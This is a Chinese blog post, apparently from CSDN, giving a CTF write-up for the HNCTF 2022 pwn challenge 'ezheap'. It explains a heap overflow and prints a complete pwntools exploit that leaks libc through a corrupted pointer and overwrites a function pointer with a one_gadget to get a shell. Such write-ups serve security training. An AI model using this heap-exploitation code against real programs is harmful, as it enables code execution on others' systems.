[HNCTF 2022 WEEK4]ezheap

已于 2023-06-30 12:31:34 修改
阅读量1k 收藏 2
点赞数 2
分类专栏: Pwn 文章标签: 安全 网络 网络安全 linux python
于 2023-04-26 20:15:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/130393504
版权

Index

前言

手把手教学,覆盖一切途中会遇到的问题。
[HNCTF 2022 WEEK4]ezheap

Checksec & IDA

在这里插入图片描述
保护全开,但是四肢健全(四项功能 增删改查),因此是ezheap。
主要来观察函数addshow
delete不存在UAF漏洞。
但是edit函数存在堆溢出。
这里就简要放一下关键代码:

    v0 = heaplist[v3];
    *(_QWORD *)(v0 + 16) = malloc(v4);
    *(_QWORD *)(heaplist[v3] + 32LL) = &puts;
    if ( !*(_QWORD *)(heaplist[v3] + 16LL) )

add函数会在用户申请的堆块之前申请一个大小为0x20的堆块,并会在用户申请的自定义大小的堆块的Chunk Header的Prev_Size位存放puts函数的地址。
我们利用这一点可以进行泄露libc。
show函数是我们完成getshell最重要的一个函数。

    (*(void (__fastcall **)(_QWORD))(heaplist[v1] + 32LL))(heaplist[v1]);
    return (*(__int64 (__fastcall **)(_QWORD))(heaplist[v1] + 32LL))(*(_QWORD *)(heaplist[v1] + 16LL));

具体的意思是将Prev_Size的地址取出,作为函数调用,然后取出fd指针,作为参数。
也就是说,现在的情况下,是这样的:
puts(0x56047f62a040)
或者
puts(0x56047f62a090)
puts函数会将指向的堆块内的内容打印出来。我们只需要修改成存储了puts函数的Chunk Header的地址即可。
比如修改成
puts(0x56047f62a080)
这样就会打印出来我们的puts函数地址,接收后即可计算出基址。
在这里插入图片描述

addr = leak_addr(2, io)
print(hex(addr))
aio = libc_remastered('puts', addr)
base = aio[0]

def leak_addr(i, io_i):
    if i == 1:
        address_internal = u64(io_i.recvuntil(b'\x7f')[:6].ljust(8, b'\x00'))
        return address_internal
    if 1 == 0:
        address_internal = u32(io_i.recv(4))
        return address_internal
    if i == 2:
        address_internal = u64(io_i.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
        return address_internal

def libc_remastered(func, addr_i):
    libc_i = LibcSearcher(func, addr_i)
    libc_base_i = addr_i - libc_i.dump(func)
    sys_i = libc_base_i + libc_i.dump('system')
    sh_i = libc_base_i + libc_i.dump('str_bin_sh')
    return libc_base_i, sys_i, sh_i

在这里插入图片描述
然后就是修改puts函数为one_gadget。
这个是最简便的做法,实际上也很简单。
在这里插入图片描述
在这里插入图片描述

from PwnModules import *

io = process('./ezheap')
# io = remote('node2.anna.nssctf.cn','28886')
elf = ELF('./ezheap')
context(arch='amd64', os='linux', log_level='debug')


def debug():
    gdb.attach(io)
    pause()


def choice(idx):
    io.sendlineafter(b'Choice: \n', str(idx))


def add(idx, sz, nm, content):
    choice(1)
    io.sendlineafter(b'idx:\n', str(idx))
    io.sendlineafter(b'Size:\n', str(sz))
    io.sendlineafter(b'Name: \n', nm)
    io.sendlineafter(b'Content:\n', content)


def edit(idx, sz, data):
    choice(4)
    io.sendlineafter(b'idx:\n', str(idx))
    io.sendlineafter(b'Size:\n', str(sz))
    io.send(data)


def free(idx):
    choice(2)
    io.sendlineafter(b'idx:\n', str(idx))


def show(idx):
    choice(3)
    io.sendlineafter(b'idx:\n', str(idx))


add(0, 0x10, b'Leak', b'AAAA')
add(1, 0x10, b'Leak', b'AAAA')
Payload = p64(0) * 3 + p64(0x31) + p64(0) * 2 + p8(0x80)
edit(0, 0x31, Payload)
# 原理是通过修改puts函数的参数,原本是打印某个堆块的内容,更改为我们创建的堆块地址的Header,即可打印出我们的puts地址。
show(1)
#debug()
addr = leak_addr(2, io)
print(hex(addr))
aio = libc_remastered('puts', addr)
base = aio[0]

one_gadget = 0x45226 + base

Payload = p64(0) * 3 + p64(0x31) + p64(0) * 4 + p64(one_gadget)
edit(0, 0x50, Payload)
debug()
show(1)

io.interactive()
Red-Leaves
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
week_4.ipynb
01-24
week_4.ipynb
暑假集训周报WEEK4
08-04
暑假集训周报WEEK4
week2day2
02-18
week2day2
Com.Week4.zip
01-25
Com.Week4
week4:Week4_Task
03-29
week4:Week4_Task
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 1565
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
NSSCTF靶场练习---HNCTF2022Week3&4部分wp
Sciurdae的博客
12-05 1263
函数来获取DLL中某个导出函数的地址,在这里就是,加载Dll1.dll,来获取其中名为ttt的函数地址,之后将其保存在ProcAddress变量中。不过这题不用怎么过,直接动态调试就好,断点下载11行main函数处,之后看汇编,在第一处exit处要跳过。加载了一个名为Dll1.dll的动态链接库,这个函数会返回一个模块的句柄hModule。IDA64打开,发现就是一个TEA加密,然后用dododo函数对v6(key)做了加密。之后就一直F8,直到程序打印出新的key就好了。先查壳,无壳,64bit。
[HNCTF 2022 WEEK4]checker
liaochonxiang的博客
06-10 116
是 JavaScript 中的一个内置函数,它用于将 base64 编码的字符串解码为原始二进制数据(即“ascii-to-binary”)总结一下就是对password进行解密得到的字符串与goldenticket相等。所以我们只需要将goldenticket进行base64加密就行。它的意思是如果输入正确,得到一个正确的flag。打开开发者模式,找到源代码,找到关键函数。然后将对应的账号和密码输入,得到flag。
NewStarCTF 2023 公开赛道 WEEK4|PWN
weixin_51890658的博客
11-01 351
1.game考点:一字节漏洞开了canary和地址随机,拖入ida分析,一个小菜单,在初始化时选择给v6赋值,用它来确定是送原石还是kfc联名套餐,在循环中看出只能选择一个 1为送原石的条件,当v7>0x3ffff可泄露system地址 myread函数中存在一字节漏洞,输入8个非\n数据,可把v6修改为0,所以先把v6赋值为1,通过一字节洞把v6赋为0,可进入送原石,然后v8,v9都为1了,此时可进入这个地方,libc库查出puts和system的偏移量,然后通过偏移量把puts改为system,(v5
HNCTF-re部分复现
weixin_61154173的博客
04-23 789
dfs迷宫01背包问题,这几天在做HNCTFweek3,week4部分,学到了一些不知道的没接触过的东西,所以记录一下。
[HNCTF 2022 Week1] PWN 复现
Xzzzz911的博客
08-18 1409
至于payload的构造格式,就要了解64位程序的传参方式,前六个参数是通过rdi, rsi, rdx, rcx, r8, r9, 这六个寄存器,后续的参数通过栈传递,记住格式就行。首先分析一下代码,可知出现了两个buf,但是这两个buf的作用是不同的,第一个buf在bss段,这样就可以把binsh写进buf里面,然后执行system(binsh)获得flag。签到题,直接nc就行,但是这里有坑需要注意下,直接cat flag,得到的是一个假的flag,真的flag分为两部分,这点需要注意下。
2022HNCTF---Week4 crypto wp
3tefanie丶zhou的博客
10-31 730
【心仪女子之美,总是这般动人,美得教人装得下日月的双眼都装不下她,得搬去心扉,余在心头。】
ez_uaf复现
最新发布
xiaolei0413的博客
04-18 822
之前在学习堆的时候中途懈怠了,导致进度止步不前一直未能理解堆题如何操作,俩个星期前重新开始学习堆的知识,在看完各种视频和博客后有了这一次的uaf题复现。
【PWN · heap | UAF】[HNCTF 2022 WEEK4]ez_uaf
Mr_Fmnwon的博客
03-02 624
UAF释放后重用,常见于free指针后指针未置Nullptr。这就导致了原本的功能块还可以使用,而新分配的功能块又附加了额外的功能。利用就在此产生。强烈建议手动画图!以至于第一次在大致写完遇到bug后,甚至仅通过画图审计代码来修改逻辑上的问题,成功实现利用!这说明利用思路是如此清晰。
[libc-2.31 off_by_null] N0wayBack ezheap练习
weixin_52640415的博客
09-12 383
libc-2.31 off_by_null 堆
CTF笔记 个人HNCTF反思(部分题目)
qq_51248658的博客
10-31 2009
[WEEK2]easy_include、[WEEK2]easy_unser、[WEEK2]easy_sql、[WEEK2]ez_SSTI、[WEEK4]pop子和pipi美
2022HNCTF-re部分题解
weixin_61154173的博客
12-04 1166
2022HNCTF-re部分
NSSCTF刷题[HNCTF 2022 WEEK4]ez_lsp
CLAY0011的博客
11-30 262
查看,可看到PNG图片,提取出来,得到base32的编码,解一下。得到一张二维码,用工具扫一下。解压得到一张图片,然后用。
NSSCTF web刷题记录3
rev1ve的博客
10-28 557
使用 uniqid() 生成一个唯一的标识符,并将其与 .txt 扩展名拼接为文件名,赋值给变量 $uuid;这里关键是要去得到cookie_secret的值,借助百度,Tornado框架的附属文件handler.settings中存在cookie_secret,修改下payload。我们要把flag复制到app.py,但是我们不知道当前目录是什么,所以多尝试看看需要几个。分别赋值即可绕过,那么我们再来看看date函数,我们本地测试下。,然后结合存在app.py,我们用cp命令把。
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程代码执行等安全问题。根据引用\[2\]中的代码片段,这个挑战可能涉及到通过传递参数来实现SSRF攻击,其中包括目标主机和端口。具体的攻击方法和解决方案需要根据题目的具体要求和环境来确定。 #### 引用[.reference_title] - *1* *2* [SSRF总结](https://blog.csdn.net/weixin_53090346/article/details/129025771)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [2022 SWPU新生赛&HNCTF web部分题目](https://blog.csdn.net/weixin_63231007/article/details/127135455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值